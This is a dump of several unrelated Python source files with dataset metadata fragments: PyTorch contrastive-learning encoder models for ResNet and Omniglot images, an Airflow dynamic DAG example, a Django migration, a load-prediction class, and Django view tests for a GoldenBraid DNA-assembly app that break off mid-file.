if resnet_depth == 18:
my_resnet = resnet18()
resnet_output_dim = 512
elif resnet_depth == 34:
my_resnet = resnet34()
resnet_output_dim = 512
elif resnet_depth == 50:
my_resnet = resnet50()
resnet_output_dim = 2048
for name, module in my_resnet.named_children():
if name == 'conv1':
module = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
if not isinstance(module, nn.Linear) and not isinstance(module, nn.MaxPool2d):
self.f.append(module)
# encoder
self.f = nn.Sequential(*self.f)
# projection head
self.g = nn.Sequential(nn.Linear(resnet_output_dim, 512, bias=False), nn.BatchNorm1d(512),
nn.ReLU(inplace=True), nn.Linear(512, feature_dim, bias=True))
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
# for 105x105 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96
nn.BatchNorm2d(num_features=64),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 48
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 21
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 9
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# for 28x28 size (using max_pool)
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x, norm=True):
feature = self.f(x)
out = self.g(feature)
if norm:
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
else:
return F.normalize(feature, dim=-1), out
# for 28x28 size (not using maxpool)
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# +
# for 28x28 size
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
def forward(self, x):
return self.func(x)
class Recon_Omniglot_Model(nn.Module):
def __init__(self):
super(Recon_Omniglot_Model, self).__init__()
# reconstructer (approximately the inverse of the encoder)
self.f = nn.Sequential(
nn.Linear(1024, 9*128, bias=False),
nn.BatchNorm1d(num_features=9*128),
nn.ReLU(inplace=True), # (9*128 -> 3*3*128)
Lambda(lambda x: x.view(-1, 128, 3, 3)),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0,
output_padding=0, bias=False), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=1, kernel_size=3, stride=1, padding=1,
output_padding=0, bias=True), # out: 28
#nn.Sigmoid(),
)
def forward(self, x):
recon = self.f(x)
return recon
# -
# for 56x56 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 28
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
| import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision.models.resnet import resnet18, resnet34, resnet50
class Model(nn.Module):
def __init__(self, feature_dim=128, resnet_depth=18):
super(Model, self).__init__()
self.f = []
if resnet_depth == 18:
my_resnet = resnet18()
resnet_output_dim = 512
elif resnet_depth == 34:
my_resnet = resnet34()
resnet_output_dim = 512
elif resnet_depth == 50:
my_resnet = resnet50()
resnet_output_dim = 2048
for name, module in my_resnet.named_children():
if name == 'conv1':
module = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)
if not isinstance(module, nn.Linear) and not isinstance(module, nn.MaxPool2d):
self.f.append(module)
# encoder
self.f = nn.Sequential(*self.f)
# projection head
self.g = nn.Sequential(nn.Linear(resnet_output_dim, 512, bias=False), nn.BatchNorm1d(512),
nn.ReLU(inplace=True), nn.Linear(512, feature_dim, bias=True))
def forward(self, x):
x = self.f(x)
feature = torch.flatten(x, start_dim=1)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
# for 105x105 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96
nn.BatchNorm2d(num_features=64),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 48
nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 21
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 9
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# for 28x28 size (using max_pool)
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x, norm=True):
feature = self.f(x)
out = self.g(feature)
if norm:
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
else:
return F.normalize(feature, dim=-1), out
# for 28x28 size (not using maxpool)
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2),
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
#nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
# +
# for 28x28 size
class Lambda(nn.Module):
def __init__(self, func):
super(Lambda, self).__init__()
self.func = func
def forward(self, x):
return self.func(x)
class Recon_Omniglot_Model(nn.Module):
def __init__(self):
super(Recon_Omniglot_Model, self).__init__()
# reconstructer (approximately the inverse of the encoder)
self.f = nn.Sequential(
nn.Linear(1024, 9*128, bias=False),
nn.BatchNorm1d(num_features=9*128),
nn.ReLU(inplace=True), # (9*128 -> 3*3*128)
Lambda(lambda x: x.view(-1, 128, 3, 3)),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0,
output_padding=0, bias=False), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1,
output_padding=1, bias=False), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.ConvTranspose2d(in_channels=128, out_channels=1, kernel_size=3, stride=1, padding=1,
output_padding=0, bias=True), # out: 28
#nn.Sigmoid(),
)
def forward(self, x):
recon = self.f(x)
return recon
# -
# for 56x56 size
'''
class Omniglot_Model(nn.Module):
def __init__(self):
super(Omniglot_Model, self).__init__()
# encoder
self.f = nn.Sequential(
nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 28
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 14
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 7
nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7
nn.BatchNorm2d(num_features=128),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2, stride=2), # out: 3
nn.Flatten(),
nn.Linear(9*128, 1024),
)
# projection head
self.g = nn.Identity()
def forward(self, x):
feature = self.f(x)
out = self.g(feature)
return F.normalize(feature, dim=-1), F.normalize(out, dim=-1)
'''
| en | 0.449118 | # encoder # projection head # for 105x105 size class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=64, kernel_size=10, stride=1, padding=0), # out: 96 nn.BatchNorm2d(num_features=64), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 48 nn.Conv2d(in_channels=64, out_channels=128, kernel_size=7, stride=1, padding=0), # out: 42 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 21 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 18 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 9 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=4, stride=1, padding=0), # out: 6 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) # for 28x28 size (using max_pool) # encoder # out: 28 #nn.MaxPool2d(kernel_size=2, stride=2), # out: 28 # out: 14 # out: 14 # out: 7 # out: 7 # out: 3 # projection head # for 28x28 size (not using maxpool) class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 14 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 14 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=1), # out: 7 
nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 7 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=2, padding=0), # out: 3 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), #nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) # + # for 28x28 size # reconstructer (approximately the inverse of the encoder) # (9*128 -> 3*3*128) # out: 7 # out: 14 # out: 28 # out: 28 #nn.Sigmoid(), # - # for 56x56 size class Omniglot_Model(nn.Module): def __init__(self): super(Omniglot_Model, self).__init__() # encoder self.f = nn.Sequential( nn.Conv2d(in_channels=1, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 56 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 28 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 28 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 14 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 14 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 7 nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, stride=1, padding=1), # out: 7 nn.BatchNorm2d(num_features=128), nn.ReLU(inplace=True), nn.MaxPool2d(kernel_size=2, stride=2), # out: 3 nn.Flatten(), nn.Linear(9*128, 1024), ) # projection head self.g = nn.Identity() def forward(self, x): feature = self.f(x) out = self.g(feature) return F.normalize(feature, dim=-1), F.normalize(out, dim=-1) | 2.700084 | 3 |
example_app/example_app/dags/dynamic_dag101.py | dhan16/airflow | 0 | 6617425 | import datetime as dt
from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
default_args = {
'owner': 'me',
'start_date': dt.datetime(2018, 1, 1),
'retries': 1,
'retry_delay': dt.timedelta(minutes=5),
}
def create_dag(dag_id, schedule, dag_number, default_args):
dag = DAG(dag_id, schedule_interval=schedule, catchup=False, default_args=default_args)
def hello_world1(*args):
print('hello_world1 DAG_ID:{} This is DAG: {}'.format(dag_id, str(dag_number)))
def hello_world2(*args):
print('hello_world2 DAG_ID:{} This is DAG: {} args:{}'.format(dag_id, str(dag_number), args))
with dag:
t1 = PythonOperator(task_id='hello_world1',python_callable=hello_world1)
t2 = PythonOperator(task_id='hello_world2',python_callable=hello_world2)
return dag
# build a dag for each number in range(10)
for n in range(1, 10):
dag_id = 'dynamic_dag101_{}'.format(str(n))
globals()[dag_id] = create_dag(dag_id, '@daily', n, default_args) | import datetime as dt
from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
default_args = {
'owner': 'me',
'start_date': dt.datetime(2018, 1, 1),
'retries': 1,
'retry_delay': dt.timedelta(minutes=5),
}
def create_dag(dag_id, schedule, dag_number, default_args):
dag = DAG(dag_id, schedule_interval=schedule, catchup=False, default_args=default_args)
def hello_world1(*args):
print('hello_world1 DAG_ID:{} This is DAG: {}'.format(dag_id, str(dag_number)))
def hello_world2(*args):
print('hello_world2 DAG_ID:{} This is DAG: {} args:{}'.format(dag_id, str(dag_number), args))
with dag:
t1 = PythonOperator(task_id='hello_world1',python_callable=hello_world1)
t2 = PythonOperator(task_id='hello_world2',python_callable=hello_world2)
return dag
# build a dag for each number in range(10)
for n in range(1, 10):
dag_id = 'dynamic_dag101_{}'.format(str(n))
globals()[dag_id] = create_dag(dag_id, '@daily', n, default_args) | en | 0.540912 | # build a dag for each number in range(10) | 2.842634 | 3 |
qa/migrations/0012_auto_20180225_2334.py | userimack/my_quora_app | 0 | 6617426 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-25 18:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('qa', '0011_ratequestion'),
]
operations = [
migrations.AlterModelOptions(
name='answer',
options={'ordering': ['-date']},
),
migrations.AlterModelOptions(
name='category',
options={'ordering': ['-name'], 'verbose_name_plural': 'Categories'},
),
migrations.AlterModelOptions(
name='question',
options={'ordering': ['-date']},
),
migrations.AlterField(
model_name='ratequestion',
name='rating',
field=models.BooleanField(help_text='Rate the question'),
),
]
| # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-02-25 18:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('qa', '0011_ratequestion'),
]
operations = [
migrations.AlterModelOptions(
name='answer',
options={'ordering': ['-date']},
),
migrations.AlterModelOptions(
name='category',
options={'ordering': ['-name'], 'verbose_name_plural': 'Categories'},
),
migrations.AlterModelOptions(
name='question',
options={'ordering': ['-date']},
),
migrations.AlterField(
model_name='ratequestion',
name='rating',
field=models.BooleanField(help_text='Rate the question'),
),
]
| en | 0.749665 | # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2018-02-25 18:04 | 1.649531 | 2 |
MiGRIDS/Model/Controls/predictLoad0.py | mmuellerstoffels/GBSTools | 8 | 6617427 | <reponame>mmuellerstoffels/GBSTools
# Project: GBS Tool
# Author: <NAME>, <EMAIL>
# Date: February 16, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
# calculate a short term future load
class predictLoad:
def __init__(self):
self.futureLoad = 0
def predictLoad(self, SO):
# simple calculation, return the mean of the last 1 hour load
#startIdx = max(SO.idx - int(3600/SO.timeStep), 0)
#stopIdx = SO.idx+1
self.futureLoad = SO.DM.realLoad1hrTrend[SO.masterIdx] #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | # Project: GBS Tool
# Author: <NAME>, <EMAIL>
# Date: February 16, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
# calculate a short term future load
class predictLoad:
def __init__(self):
self.futureLoad = 0
def predictLoad(self, SO):
# simple calculation, return the mean of the last 1 hour load
#startIdx = max(SO.idx - int(3600/SO.timeStep), 0)
#stopIdx = SO.idx+1
self.futureLoad = SO.DM.realLoad1hrTrend[SO.masterIdx] #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | en | 0.681462 | # Project: GBS Tool # Author: <NAME>, <EMAIL> # Date: February 16, 2018 # License: MIT License (see LICENSE file of this package for more information) # imports # calculate a short term future load # simple calculation, return the mean of the last 1 hour load #startIdx = max(SO.idx - int(3600/SO.timeStep), 0) #stopIdx = SO.idx+1 #np.mean(SO.DM.realLoad[startIdx:stopIdx]) | 2.267359 | 2 |
goldenbraid/tests/test_views.py | bioinfcomav/goldebraid | 0 | 6617428 | # Copyright 2013 <NAME>, Univ.Politecnica Valencia, Consejo Superior de
# Investigaciones Cientificas
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os.path
from cStringIO import StringIO
from django.test import TestCase, Client
from django.core.urlresolvers import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings as proj_settings
from django.contrib.auth.models import User
from Bio import SeqIO
import goldenbraid
from goldenbraid.views.feature import FeatureForm
from goldenbraid.tests.test_fixtures import FIXTURES_TO_LOAD
from goldenbraid.models import Feature
from goldenbraid.tags import VECTOR_TYPE_NAME, MODULE_TYPE_NAME
TEST_DATA = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
class FeatureTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_feature_page(self):
client = Client()
url = reverse('feature_view', kwargs={'uniquename': 'pAn11'})
response = client.get(url)
assert response.status_code == 200
assert "Feature pAn11" in str(response)
def test_add_feature_form(self):
test_data = os.path.join(os.path.split(goldenbraid.__path__[0])[0],
'goldenbraid', 'tests', 'data')
# test of the form
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertTrue(form.is_valid())
# test of the form with blanck values
gb_path = os.path.join(test_data, 'pAn11_uniq.gb')
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'CDS', 'vector': 'pDGB1_alpha1'}
uploaded_fhand = open(gb_path)
file_dict = {}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': 'vecto'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('type')
# vector does not exist
# test of the form with wrong type
post_dict = {'uniquename': 'vector1', 'name': 'vector1',
'type': VECTOR_TYPE_NAME, 'enzyme_out': 'vector1_enz_out',
'vector': 'vector1'}
uploaded_fhand = open(gb_path)
file_dict = {'gbfile': SimpleUploadedFile(uploaded_fhand.name,
uploaded_fhand.read())}
form = FeatureForm(post_dict, file_dict)
self.assertFalse(form.is_valid())
assert form.errors.get('vector')
def test_add_feature_view(self):
# test of the form page
# test of the form
User.objects.create_user(username='admin', email='<EMAIL>',
password='password')
gb_path = os.path.join(TEST_DATA, 'pAn11_uniq.gb')
client = Client()
url = reverse('add_feature')
# no login, no access
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
client.login(username='admin', password='password')
# show form
response = client.get(url)
assert "pDGB1_alpha1" in str(response)
# add a feature
url = reverse('add_feature')
response = client.post(url, {'name': 'vector1',
'type': MODULE_TYPE_NAME,
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_omega1R',
'gbfile': open(gb_path)})
assert response.status_code == 302
# TODO url to genbank file
# response = client.get('/media/genbank_files/pAn11.gb')
feat = Feature.objects.get(uniquename='pAn11_uniq')
assert feat.name == 'vector1'
assert feat.props == {u'Description': [u'vector1 desc'],
u'Reference': [u'vector1 ref']}
# add a feature
url = reverse('add_feature')
gb_path = os.path.join(TEST_DATA, 'GB_DOMEST_15.gb')
response = client.post(url, {'name': 'vector1',
'type': 'TU',
'description': 'vector1 desc',
'reference': 'vector1 ref',
'vector': 'pDGB1_alpha2',
'gbfile': open(gb_path)})
assert response.status_code == 200
os.remove(os.path.join(proj_settings.MEDIA_ROOT,
feat.genbank_file.name))
def test_search_feature(self):
client = Client()
url = reverse('search_features')
response = client.get(url)
assert response.status_code == 200
assert "<option value=" in str(response)
response = client.post(url, {'name_or_description': 'pAn11'})
assert response.status_code == 302
response = client.post(url, {'kind': 'TER'})
assert response.status_code == 200
assert "<td>This is a pGreen destiny vector of the" in str(response)
client.login(username='test', password='<PASSWORD>')
response = client.post(url, {'only_user': True})
assert response.status_code == 200
assert 'pDGB2_alpha2R' in str(response)
class MultipartiteFreeTestViews(TestCase):
fixtures = FIXTURES_TO_LOAD
multi_db = True
def test_view(self):
client = Client()
url = reverse('multipartite_view_free')
response = client.get(url)
assert "pDGB2_alpha1R" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '1'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11'})
assert "An11" in str(response)
url = reverse('multipartite_view_free', kwargs={'form_num': '2'})
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferas'})
assert 'feature does not exist' in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase'})
assert "pT35S" in str(response)
response = client.post(url, {'vector': 'pDGB2_alpha1R',
'part_1': 'pP2A11',
'part_2': 'pLuciferase',
'part_3': 'pT35S'})
assert "<p>You have assembled in the GoldenBraid" in str(response)
# reverse vector
url = reverse('multipartite_view_free_genbank')
response = client.post(url, {'part_1': 'pP2A11',
'part_2': 'pMYB12',
'part_3': 'pTerm2A11',
'vector': 'pDGB1_alpha1R'})
assert response.status_code == 200
seqrec1 = SeqIO.read(StringIO(str(response)), 'gb')
assert seqrec1.name == 'GB_UA_E'
multipartite_free_seq1 = str(seqrec1.seq)
gb_path = os.path.join(TEST_DATA, 'pEGBMybrev_uniq.gb')
seqrec2 = SeqIO.read(gb_path, 'gb')
multipartite_free_seq2 = str(seqrec2.seq)[4:]
multipartite_free_seq2 += str(seqrec2.seq)[:4]
assert multipartite_free_seq1 == multipartite_free_seq2
# with more than one part of the same type
